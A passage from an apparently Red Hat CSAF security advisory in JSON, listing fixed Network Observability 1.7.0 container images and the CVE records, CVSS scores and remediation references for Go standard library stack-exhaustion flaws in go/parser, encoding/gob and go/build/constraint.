"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion"
},
{
"cve": "CVE-2024-34156",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:09.377905+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310528"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in Go\u0027s `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34156"
},
{
"category": "external",
"summary": "RHBZ#2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156"
},
{
"category": "external",
"summary": "https://go.dev/cl/611239",
"url": "https://go.dev/cl/611239"
},
{
"category": "external",
"summary": "https://go.dev/issue/69139",
"url": "https://go.dev/issue/69139"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3106",
"url": "https://pkg.go.dev/vuln/GO-2024-3106"
}
],
"release_date": "2024-09-06T21:15:12.020000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-34158",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2024-09-06T21:20:12.126400+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310529"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion",
